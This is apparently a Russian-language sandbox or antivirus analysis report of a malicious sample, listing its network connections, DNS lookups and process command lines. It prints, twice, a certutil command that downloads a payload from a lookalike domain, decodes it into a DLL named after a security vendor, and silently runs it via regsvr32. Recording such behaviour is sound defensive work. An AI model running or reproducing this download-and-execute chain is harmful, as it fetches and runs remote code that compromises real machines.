Техническая информация
- '<SYSTEM32>\cmd.exe' /b /c "certutil -urlcache -split -f https://crashlytics.ru/crashes/report && certutil -decode -f report symantec.dll && start /min "" regsvr32 /s /i symantec.dll"
- %TEMP%\report
- 'cr###lytics.ru':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'cr###lytics.ru':443
- DNS ASK cr###lytics.ru
- DNS ASK pk#.goog
- '<SYSTEM32>\cmd.exe' /b /c "certutil -urlcache -split -f https://crashlytics.ru/crashes/report && certutil -decode -f report symantec.dll && start /min "" regsvr32 /s /i symantec.dll"' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://crashlytics.ru/crashes/report
- '<SYSTEM32>\certutil.exe' -decode -f report symantec.dll